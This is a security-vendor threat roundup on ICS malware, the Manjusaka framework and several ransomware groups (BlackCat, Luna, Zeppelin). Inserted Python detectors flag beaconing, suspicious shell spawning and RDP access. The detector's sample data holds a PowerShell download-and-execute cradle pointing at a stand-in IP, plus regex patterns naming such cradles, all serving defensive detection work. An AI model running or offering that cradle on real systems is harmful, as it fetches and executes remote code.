Our research team compiled the latest updates on newly announced CVEs, recent ransomware attacks including BlackCat & Luna, and IoT security news. They also offer analysis of the potential impacts and their expert recommendations:
ICS
Sality Malware Infecting ICS Using a Password Recovery Tool
A threat actor is infecting ICS to create a botnet through password “cracking” software for PLCs and HMIs. In one incident, the tool exploited CVE-2022-2003 in DirectLogic PLCs from Automation Direct to extract the password and dropped Sality, a piece of malware that creates a peer-to-peer botnet.
Affected Vendors: This recovery tool promises to unlock PLCs and HMIs from Automation Direct, Omron, Siemens, Fuji Electric, Mitsubishi, LG, Vigor, Schneider Electric, Allen Bradley, Weintek, ABB, and Panasonic.
Attack Parameters: The exploit used by the tool works over serial-only communications as well as over Ethernet.
Impact: Sality can terminate processes, open connections to remote sites, download additional payloads, or steal data from the host. It can also inject itself into running processes and copy itself onto network shares, external drives, and removable storage devices that could carry it to other systems.
In this case, it appeared to be focused on stealing cryptocurrency.
Recommendations: Automation Direct has released a patch for the exploited vulnerability.
SCADAfence Coverage: The vulnerabilities exploited in this attack are included in the CVE DB.
Manjusaka Post-Exploitation Attack Framework
A new post-exploitation attack framework, Manjusaka, an alternative to Cobalt Strike, was observed in the wild.
Attack Parameters: Manjusaka uses implants written in Rust, while its binaries are written in GoLang. Its RAT implants support command execution, file access, network reconnaissance, and more, so hackers can use it for the same operational goals as Cobalt Strike.
The implant can execute arbitrary commands using “cmd.exe”, get file information, get current network connections, collect browser credentials, take screenshots, obtain system information, and activate the file management module.
The infection chain includes a malicious document that executes to fetch a second-stage payload, Cobalt Strike, and load it in memory. Cobalt Strike is later used to download Manjusaka implants.
The C2 communications are executed via HTTP GET requests.
Impact: Right now, it looks like Manjusaka is tentatively deployed for testing, so its development is likely not in its final phases. However, it is already powerful enough for real-world use.
Recommendations: Track HTTP activity for potential attacks using the User Activity Analyzer.
SCADAfence Coverage: The SCADAfence Platform detects the use of Cobalt Strike. It also detects command execution via HTTP GET requests and via “cmd.exe”.
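The Manjusaka item above notes that its C2 traffic runs over plain HTTP GET requests and recommends tracking HTTP activity. One practical way to do that from proxy or web-gateway logs is to look for clients that fetch the same host at machine-regular intervals, since implants poll on a timer while people do not. The script below is an added example written for this page, not code from SCADAfence or from the Talos research; the log format, the hosts and the timings are all constructed, and the 30-second interval and thresholds are assumptions chosen to make the pattern visible.

```python
"""Flag beacon-like HTTP GET traffic in proxy logs (added example, constructed data)."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample proxy log lines (not real IoCs) in the format:
#   <ISO timestamp> <client ip> <method> <host> <path> <status>
# 10.1.1.5 polls one external host every 30 s; 10.1.1.9 is ordinary browsing.
SAMPLE_LOG = """\
2022-08-10T09:00:00 10.1.1.5 GET 203.0.113.7 /status 200
2022-08-10T09:00:30 10.1.1.5 GET 203.0.113.7 /status 200
2022-08-10T09:01:00 10.1.1.5 GET 203.0.113.7 /status 200
2022-08-10T09:01:30 10.1.1.5 GET 203.0.113.7 /status 200
2022-08-10T09:02:00 10.1.1.5 GET 203.0.113.7 /status 200
2022-08-10T09:02:30 10.1.1.5 GET 203.0.113.7 /status 200
2022-08-10T09:00:12 10.1.1.9 GET intranet.example.internal /news 200
2022-08-10T09:03:40 10.1.1.9 GET intranet.example.internal /news/item/4 200
2022-08-10T09:04:01 10.1.1.9 GET intranet.example.internal /search?q=pump 200
2022-08-10T09:15:55 10.1.1.9 GET intranet.example.internal /news 200
2022-08-10T09:31:02 10.1.1.9 GET intranet.example.internal /docs 200
2022-08-10T09:33:49 10.1.1.9 POST intranet.example.internal /login 302
"""


def parse_log(text):
    """Parse the constructed log format into (timestamp, src, method, host, path, status) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, method, host, path, status = line.split()
        events.append((datetime.fromisoformat(ts), src, method, host, path, int(status)))
    return events


def find_beacons(events, min_requests=5, max_jitter=0.2):
    """Return (src, host, request_count, mean_interval_seconds) for every
    client/host pair whose GET requests arrive at suspiciously regular intervals.

    Regularity is the coefficient of variation of the gaps between consecutive
    requests: 0.0 is a perfect timer, human browsing is usually well above 1.0.
    A low value over enough requests is a beaconing indicator, not proof, so
    hits are leads for triage rather than verdicts.
    """
    by_pair = defaultdict(list)
    for ts, src, method, host, _path, _status in events:
        if method == "GET":
            by_pair[(src, host)].append(ts)

    hits = []
    for (src, host), stamps in by_pair.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue  # every request in the same second: nothing to measure
        jitter = pstdev(gaps) / avg
        if jitter <= max_jitter:
            hits.append((src, host, len(stamps), avg))
    return hits


if __name__ == "__main__":
    for src, host, count, interval in find_beacons(parse_log(SAMPLE_LOG)):
        print(f"beacon candidate: {src} -> {host}, {count} GETs, ~{interval:.0f}s apart")
```

Real implants often add random sleep jitter, so in production the `max_jitter` threshold is tuned per environment and combined with other signals (new external host, identical response sizes, GETs with no referer), rather than used on its own.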
BlackCat Attack on European Gas Pipeline
The ALPHV ransomware gang, BlackCat, claimed responsibility for a ransomware attack against Creos Luxembourg S.A., a natural gas pipeline and electricity network operator in the central European country.
Attack Parameters: BlackCat has been observed using multiple tools in their attacks, such as Mimikatz to recover stored passwords. The ransomware exploits the ProxyShell and ProxyLogon vulnerabilities to gain remote access and the ability to execute arbitrary code and commands. This is used for spawning a PowerShell process that downloads a Cobalt Strike beacon.
Impact: The customer portals of Encevo and Creos were unavailable, but there was no interruption in the provided services. The group claims to have exfiltrated roughly 150 Gb of information, including contracts, agreements, passports, bills, and emails.
SCADAfence Coverage: The SCADAfence Platform detects the use of Mimikatz and Cobalt Strike, as well as the exploitation of the ProxyShell vulnerability.
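The BlackCat chain above (ProxyShell/ProxyLogon giving code execution on Exchange, a PowerShell process spawned to pull a Cobalt Strike beacon) and the Manjusaka chain earlier on the page (malicious document fetching a second stage) share one host-level tell: a process that should never launch a shell does so, often with a download cradle on the command line. The triage routine below is an added example written for this page, not SCADAfence code; the Sysmon-style records, paths and base64 blob are constructed, and the parent-process list and regex patterns are assumptions that a real deployment would tune. It generalizes the two items by scoring web-worker and Office parents together.

```python
"""Triage process-creation events for shells spawned by web workers or Office
documents, and for PowerShell download cradles (added example, constructed data)."""
import re

# Parents that should rarely launch a shell. Assumed mapping, not a product rule:
# w3wp.exe is the IIS worker hosting Exchange; WINWORD/EXCEL cover the malicious-document chain.
SUSPICIOUS_PARENTS = {
    "w3wp.exe": "IIS worker process",
    "winword.exe": "Office document",
    "excel.exe": "Office document",
}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Command-line markers typical of download-and-execute cradles.
CRADLE_PATTERNS = [
    re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    re.compile(r"\biex\b|invoke-expression", re.I),
    re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"-nop\b|-w(indowstyle)?\s+hidden", re.I),
]

# Constructed Sysmon-style (Event ID 1) records; hosts, paths and the encoded blob are made up.
SAMPLE_EVENTS = [
    {"ProcessId": 4001, "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.7/a')\""},
    {"ProcessId": 4002, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Service"},
    {"ProcessId": 4003, "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"ProcessId": 4004, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ProcessId": 4005, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c \"iwr https://updates.example.internal/x.ps1\""},
]


def _basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event):
    """Return (severity, reasons) for one event; severity is None when nothing matched.

    Lineage plus a cradle is 'high', lineage alone 'medium', a cradle from an
    ordinary parent 'low' (admins do use iwr/IEX, so that needs context).
    """
    parent = _basename(event["ParentImage"])
    image = _basename(event["Image"])
    cmdline = event.get("CommandLine", "")

    lineage_hit = parent in SUSPICIOUS_PARENTS and image in SHELLS
    cradle_hits = [p.pattern for p in CRADLE_PATTERNS if p.search(cmdline)]

    reasons = []
    if lineage_hit:
        reasons.append(f"{SUSPICIOUS_PARENTS[parent]} ({parent}) spawned {image}")
    reasons.extend(f"command line matches {pat!r}" for pat in cradle_hits)

    if lineage_hit and cradle_hits:
        severity = "high"
    elif lineage_hit:
        severity = "medium"
    elif cradle_hits:
        severity = "low"
    else:
        severity = None
    return severity, reasons


def triage(events):
    """Map ProcessId -> severity for every event that matched at least one rule."""
    out = {}
    for ev in events:
        severity, _reasons = classify(ev)
        if severity:
            out[ev["ProcessId"]] = severity
    return out


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        severity, reasons = classify(ev)
        if severity:
            print(ev["ProcessId"], severity, "; ".join(reasons))
```

The parent/child rule is the robust part: an IIS worker or Word spawning PowerShell is rare enough in most estates to page on by itself, whereas the cradle regexes are easy to obfuscate around and serve mainly to raise severity when they do fire.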
Luna Ransomware
A new ransomware, dubbed Luna, can be used to encrypt devices running several operating systems, including Windows, Linux, and ESXi systems.
Attack Parameters: The ransomware is written in Rust, enabling attackers to port it to multiple platforms and enabling it to evade automated static code analysis attempts.
The ransomware appears to be specifically tailored to be used only by Russian-speaking threat actors.
Impact: Luna confirms the latest trend of developing cross-platform ransomware that uses languages like Rust and Golang to create malware capable of targeting multiple operating systems with little to no changes.
SCADAfence Coverage: The SCADAfence Platform detects new connections, connections to and from external devices, and connections to and from the Internet.
The SCADAfence Platform detects suspicious behavior based on IP reputation, hash reputation, and domain reputation.
Zeppelin Ransomware
CISA and the FBI released a joint advisory detailing IOCs and TTPs of Zeppelin ransomware, a RaaS that encrypts its victims’ files multiple times. The group was also seen using the double-extortion method.
Targets: Zeppelin was observed targeting businesses and critical infrastructure organizations such as defense contractors and technology companies, with a focus on entities from the healthcare and medical industries.
Attack Parameters: The group gains access to victim networks through RDP exploitation, exploitation of SonicWall firewall vulnerabilities, and phishing campaigns. Zeppelin executed its malware multiple times within a victim’s network, creating different IDs or file extensions and leaving the victim needing several unique decryption keys.
Impact: Zeppelin actors have been known to request ransom payments in Bitcoin, with initial amounts ranging from several thousand dollars to over a million dollars.
SCADAfence Coverage: RDP connections can be tracked using the User Activity Analyzer.
The SCADAfence Platform detects new connections, connections to and from external devices, and connections to and from the Internet. The SCADAfence Platform detects suspicious behavior based on IP reputation, hash reputation, and domain reputation.
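The Zeppelin item above lists RDP exploitation as an initial-access path and notes that RDP connections can be tracked; the coverage notes for Luna and Zeppelin both mention watching new connections and connections to or from the Internet. A minimal way to turn flow records into those two checks is shown below. It is an added example written for this page, not SCADAfence Platform logic; the flow format, the addresses and the allow-list of jump hosts are constructed, and treating the RFC 1918 ranges as "inside" is an assumption that a real site would replace with its own address plan.

```python
"""Flag RDP sessions reaching OT hosts from the Internet or from internal
sources outside an allow-list (added example, constructed data)."""
import ipaddress

RDP_PORT = 3389

# Address space treated as "inside" (RFC 1918). Anything else counts as Internet-sourced.
# Using an explicit list keeps the policy visible instead of relying on library heuristics.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed allow-list: jump hosts expected to open RDP toward the OT segment.
BASELINE_RDP_SOURCES = {"10.20.0.10", "10.20.0.11"}

# Constructed flow records: "<ISO timestamp> <src ip> <dst ip> <dst port> <proto>".
# 198.51.100.23 is a documentation address standing in for an Internet host.
SAMPLE_FLOWS = """\
2022-08-11T02:14:09 198.51.100.23 10.30.5.40 3389 tcp
2022-08-11T08:02:41 10.20.0.10 10.30.5.40 3389 tcp
2022-08-11T08:05:12 10.20.0.77 10.30.5.41 3389 tcp
2022-08-11T08:06:00 10.20.0.77 10.30.5.41 502 tcp
2022-08-11T09:30:33 10.20.0.11 10.30.5.42 3389 tcp
"""


def is_internal(ip):
    """True when the address falls inside one of the configured internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_flows(text):
    """Parse the constructed flow format into (timestamp, src, dst, dport, proto) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, proto = line.split()
        flows.append((ts, src, dst, int(dport), proto.lower()))
    return flows


def review_rdp(flows, baseline=BASELINE_RDP_SOURCES):
    """Return (timestamp, src, dst, finding) for RDP flows worth an analyst's attention.

    Two findings are produced: RDP arriving from outside the internal ranges, and
    RDP from an internal host that is not on the jump-host allow-list. Other
    ports (e.g. Modbus/502) are ignored here; they belong to separate rules.
    """
    findings = []
    for ts, src, dst, dport, proto in flows:
        if proto != "tcp" or dport != RDP_PORT:
            continue
        if not is_internal(src):
            findings.append((ts, src, dst, "rdp-from-internet"))
        elif src not in baseline:
            findings.append((ts, src, dst, "rdp-from-unlisted-internal-host"))
    return findings


if __name__ == "__main__":
    for ts, src, dst, finding in review_rdp(parse_flows(SAMPLE_FLOWS)):
        print(f"{ts} {src} -> {dst}:{RDP_PORT} {finding}")
```

The first finding class is the one the best-practice list below addresses with MFA on authentication paths to OT assets; the second is the "new connection" signal, and its value depends entirely on keeping the allow-list current as jump hosts are added or retired.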
The following additional best-practice recommendations help protect against all strains of malware and ransomware:
- Make sure secure offline backups of critical systems are available and up-to-date.
- Apply the latest security patches on the assets in the network.
- Use unique passwords and multi-factor authentication on authentication paths to OT assets.
- Encrypt sensitive data when possible.
- Educate staff about the risks and methods of ransomware attacks and how to avoid infection.
For more information on keeping your ICS/OT systems protected from threats, or to see the SCADAfence platform in action, request a demo now.
About Version 2
Version 2 is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
SCADAfence helps companies with large-scale operational technology (OT) networks embrace the benefits of industrial IoT by reducing cyber risks and mitigating operational threats. Our non-intrusive platform provides full coverage of large-scale networks, offering best-in-class detection accuracy, asset discovery and user experience. The platform seamlessly integrates OT security within existing security operations, bridging the IT/OT convergence gap. SCADAfence secures OT networks in manufacturing, building management and critical infrastructure industries. We deliver security and visibility for some of world’s most complex OT networks, including Europe’s largest manufacturing facility. With SCADAfence, companies can operate securely, reliably and efficiently as they go through the digital transformation journey.